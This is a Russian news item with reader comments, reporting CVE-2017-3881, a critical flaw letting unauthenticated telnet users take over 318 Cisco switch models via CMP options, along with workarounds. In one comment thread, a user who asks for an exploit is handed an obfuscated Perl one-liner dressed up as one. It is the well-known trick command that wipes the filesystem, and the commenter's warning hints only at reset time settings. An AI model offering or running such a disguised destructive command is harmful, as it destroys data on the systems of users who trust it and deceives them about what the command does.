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10.05.2017 09:25  Устранена критическая уязвимость, затрагивающая 318 моделей коммутаторов Cisco

Компания Cisco выпустила обновление прошивки, в котором устранена критическая уязвимость (CVE-2017-3881), позволяющая получить доступ к коммутаторам на базе Cisco IOS и Cisco IOS XE, поддерживающим протокол CMP (Cluster Management Protocol). Атакующий может получить полный контроль над коммутатором, передав специфичный набор опций CMP при обращении к устройству через telnet. В том числе уязвимости подвержены популярные модели коммутаторов Cisco Catalyst 29xx, 35xx, 37xx, 45xx, 49xx.

Уязвимость подтверждена в 318 моделях коммутаторов Cisco и позволяет без аутентификации выполнить любые команды в интерфейсе командной строки, при наличии у атакующего доступа к коммутатору по протоколу telnet. Проблема вызвана ошибкой в реализации протокола CMP, предназначенного для построения кластеров коммутаторов, и связана с тем, что опции CMP могли использоваться не только для локально подключенных между собой устройств, но и при внешнем запросе по сети. В качестве обходного пути защиты можно ограничить доступ к 23 сетевому порту (telnet) или отключить обработку опций CMP. Информация об уязвимости была выявлена в ходе разбора мартовской утечки документов ЦРУ.

  1. Главная ссылка к новости (https://arstechnica.com/securi...)
  2. OpenNews: WikiLeaks опубликовал 8 тысяч документов ЦРУ с описанием инструментов и методов атак
  3. OpenNews: В браузерном дополнении Cisco WebEx выявлен URL, позволяющий выполнить код в системе
  4. OpenNews: Серия уязвимостей в продуктах Cisco, выявленных после публикации эксплоитов АНБ
  5. OpenNews: Публикация архива эксплоитов АНБ вскрыла большой пласт старых уязвимостей
  6. OpenNews: Опубликована третья порция эксплоитов АНБ
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: cisco
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  • 1.1, A.Stahl, 09:38, 10/05/2017 [ответить] [смотреть все]
    		• +7 +/
    Компания Cisco выпустила обновление прошивки, которое вы можете скачать с сайта производителя за 9.85$ при условии действующей гарантии и подтверждения подписки на ежечасный сборник ссылок "Wise housewife".
     
     
  • 2.12, Аноним, 11:57, 10/05/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]
    		• –3 +/
    Предпочитаете чтобы было как с роутерами или Андроид-телефонами, когда прошлогод... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.13, Аноним, 12:04, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    Серьезно Вы считаете, что даже патчи для таких серьезных дыр можно распространя... весь текст скрыт [показать]
     
     
  • 4.14, Аноним, 12:08, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• –3 +/
    Чтобы патч написать нужно потратить время разработчика Это стоит денег Не вижу... весь текст скрыт [показать]
     
     
  • 5.17, Гость, 12:25, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    > Чтобы патч написать нужно потратить время разработчика. Это стоит денег.

    Принимать надо профессионалов, а не по блату или с улицы. И если компания пытается сэкономить на стоимости разработки, то все издержки должен оплачивать производитель, а покупатель. Например, ты покупаешь машину, а в ней какой-то заводской недочет. Ты в сервис, а с тебя "бабки" трясут. Ты согласишься и отдашь за то, что должны сделать бесплатно?

    > У вас есть возможность использовать другие продукты других разработчиков

    Так может тогда производитель деньги вернет, а не наживается на потребителях еще раз?

    Предложи Google монетизировать поддержку своих продуктов и люди перейдут на обычные телефоны.

     
     
  • 6.18, Гость, 12:26, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    * а не покупатель.
     
  • 6.19, Аноним, 13:13, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• –1 +/
    Если уж ты упомянул автомобиль, не подскажешь в каком сервисе выполняют бесплатн... весь текст скрыт [показать]
     
     
  • 7.20, Аноним, 13:21, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Могу послать в гугл за данными о том, как часто отзывают автомобили из-за потенц... весь текст скрыт [показать]
     
     
  • 8.24, Аноним, 13:45, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    Автопроизводитель даёт гарантию и отзывает только в пределах гарантийного зар... весь текст скрыт [показать]
     
     
  • 9.28, cmp, 14:39, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    http www mercedes-benz ru content russia mpc mpc_russia_website ru home_mpc pa... весь текст скрыт [показать]
     
  • 5.23, freehck, 13:35, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    > Чтобы патч написать нужно потратить время разработчика. Это стоит денег.

    Логика просто бомба: чем хуже разработчика наймёшь, тем больше бабла срубишь.

     
     
  • 6.25, Аноним, 14:10, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Конкуренция не позволит А так да, ты прав Аналогично в других областях Напр ... весь текст скрыт [показать]
     
     
  • 7.27, 1, 14:38, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Может этот врач познал дзен ?
    А непрофессионал убил бы больного за месяц.
     
     
  • 8.30, Аноним, 14:47, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Как шутят хирурги у одного 2-3 неудачных операции в месяц, а у другого 2-3 удач... весь текст скрыт [показать]
     
  • 3.15, Гость, 12:16, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    > с роутерами или Андроид-телефонами, когда прошлогодняя модель уже не поддерживается?

    Список устройств назвать можешь или "работодатель" еще не ознакомил?

     
  • 2.21, нах, 13:28, 10/05/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    чувак, ты не в теме - совсем 1 никакая гарантия не дает тебе права скачивать... весь текст скрыт [показать] [показать ветку]
     
  • 1.4, fi, 10:02, 10/05/2017 [ответить] [смотреть все]  
    		• +/
    Трудно назвать уязвимость "критическая" - telnet давно ограничен для доступа служебной сетью, где все знают пароль от enable :)


    зы. вот в свое время, когда утек "инженерный" пароль, а 23порт листелся для всех - вот было весело - traceroute и все киски твои :D

     
  • 1.5, Аноним, 10:06, 10/05/2017 [ответить] [смотреть все]  
    		• –1 +/
    Информация об уязвимости была выявлена в ходе разбора мартовской утечки докумен... весь текст скрыт [показать]
     
     
  • 2.6, A.Stahl, 10:09, 10/05/2017 [^] [ответить] [смотреть все] [показать ветку]  
    		• +5 +/
    Не закрыли бекдор, а изменили условия его активации. Пишите правильно.
     
  • 1.8, Сергей, 10:32, 10/05/2017 [ответить] [смотреть все]  
    		• –1 +/
    А что, в этих моделях циски только телнет был?
     
  • 1.9, Аноним, 10:56, 10/05/2017 [ответить] [смотреть все]     [к модератору]  
    		• +/
    АНБ попрсило обновить бэкдор для продолжения совместоного контракта по глобально... весь текст скрыт [показать]
     
  • 1.10, 1, 11:10, 10/05/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    дайте эксплойт
     
     
  • 2.11, A.Stahl, 11:35, 10/05/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
    		• +/
    Ну держи:
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|'{;;y; -/:-@[-'{-};'-{/" -;;s;;$_;see'
    Ты только осторожно -- могут настройки времени слететь. Такой вот досадный побочный эффект.
     
     
  • 3.16, Аноним, 12:16, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Если вы юзали это 15 лет назад, то вы должно быть очень стары.
     
     
  • 4.22, Аноним, 13:33, 10/05/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Да, 30 лет - глубокая старость Домашку-то уже сделал ... весь текст скрыт [показать]
     
  • 3.29, 1, 14:40, 10/05/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    нда ...
    Про патч Бармина в курсе ?
     
  • 1.31, бедный буратино, 14:55, 10/05/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    модели хоть красивые? худенькие?
     

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